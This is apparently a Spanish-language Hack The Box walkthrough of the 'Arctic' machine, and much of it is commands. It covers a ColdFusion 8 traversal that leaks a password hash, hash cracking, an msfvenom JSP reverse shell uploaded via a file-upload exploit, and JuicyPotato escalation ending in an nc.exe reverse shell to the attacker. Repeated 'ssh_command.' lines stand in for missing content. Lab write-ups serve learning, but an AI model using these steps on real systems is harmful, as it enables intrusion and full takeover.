Arctic

Arctic


HTB Windows

echo “10.129.151.59 arctic.htb” | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.151.59 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA arctic 10.129.151.59

nmap -sU -O -p- -oA arctic-udp 10.129.151.59

nikto -h 10.129.151.59:80

gobuster dir -k -u http://10.129.151.59/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

ssh_command.

ssh_command.

ssh_command.

ssh_command.

Podemos ver que en el login tiene Adobe Coldfusion Buscamos si existe un exploit

ssh_command.

searchsploit -m multiple/remote/14641.py

ssh_command.

python2 14641.py arctic.htb 8500 ”../../../../../../../../ColdFusion8/lib/password.properties”

ssh_command.

Usamos 100 porque sha1 es 100

.\hashcat64.exe -m 100 -a 0 .\hash.txt .\SecLists-master\Passwords\rockyou.txt

ssh_command.

ssh_command.

Hashcat dice que la contrasena es: happyday

En el formulario parece quese hace un cambio al texto con javascript

ssh_command.

Despues de hacerlo como 10x Lo que tenia que hacer era usar burp suite y foxy proxy

Hacer esto lo mas rapido posible en 30 segundos

ssh_command.

cambiar lo que dice en cfadminPassword y poner lo que te sale en la consola despues de correr lo siguiente en la consola de js

console.log(hex_hmac_sha1(document.loginform.salt.value, ‘2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03’)); Ir al formulario y poner happyday como contrasena

Vamos a system settings y mappings

ssh_command.

Tomamos cuenta que el directorio es C:\ColdFusion8\wwwroot\CFIDE

Despues nos dirigimos a Debugging & Logging -> Scheduled Task

ssh_command.

ssh_command.

Trate de usar este script pero no me funciono: https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/web-backdoors/cfm/cfExec.cfm

msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=5555 > arctic_shell.jsp

Bajar el codigo en esta pagina: https://forum.hackthebox.eu/discussion/116/python-coldfusion-8-0-1-arbitrary-file-upload

Y crear un archivo con ese codigo

python2 arb-file-exploit.py 10.129.151.59 8500 shell.jsp rlwrap nc -lvnp 5555

Nos dirigimos a: http://10.129.151.59:8500/userfiles/file/exploit.jsp

ssh_command.

Le damos click a save output to a file

ssh_command.

Encontramos arctic_shell2.jsp en el index de CFIDE

ssh_command.

nc -lvnp 443

Nos vamos con juicy potato cuando vemos SeImpersonatePrivilege

ssh_command.

https://github.com/ohpe/juicy-potato/releases/tag/v0.1

certutil.exe -f -urlcache -split http://10.10.xx.xx/JuicyPotato.exe JuicyPotato.exe

python3 -m http.server 80

ssh_command.

Hacemos un directorio en windows\temp

ssh_command.

Tuve que agregar unos caracteres mas en la contrasena.

ssh_command.

Para validar el usuario:

net user

ssh_command.

JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a “/c \10.10.xx.xx\smbFolder\nc.exe -e cmd 10.10.xx.xx 443”

ssh_command.

nc -lvnp 443

ssh_command.

© 2025 Cu3rv0x